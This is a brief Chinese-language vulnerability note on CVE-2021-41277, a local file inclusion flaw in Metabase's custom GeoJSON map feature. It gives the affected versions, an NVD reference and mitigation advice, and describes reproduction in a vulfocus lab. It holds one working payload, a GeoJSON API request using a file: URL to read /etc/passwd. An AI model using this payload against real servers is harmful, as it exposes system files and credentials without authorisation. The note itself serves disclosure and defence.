CVE-2021-41277 Metabase 敏感信息泄漏

漏洞描述

Metabase是一个开源数据分析平台。在受影响的版本中，已发现自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）支持和潜在的本地文件包含（包括环境变量）存在安全问题。在加载之前未验证 URL。此问题已在新的维护版本（0.40.5 和 1.40.5）以及之后的任何后续版本中修复。如果您无法立即升级，您可以通过在反向代理或负载均衡器或 WAF 中包含规则以在应用程序之前提供验证过滤器来缓解这种情况。

漏洞版本

<0.40.5和<1.40.5的版本存在漏洞。

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2021-41277

漏洞影响

01.png

漏洞利用

使用vulfocus.fofa.so上的环境进行复现，搜索

/api/geojson?url=file:/etc/passwd

02.png

snort规则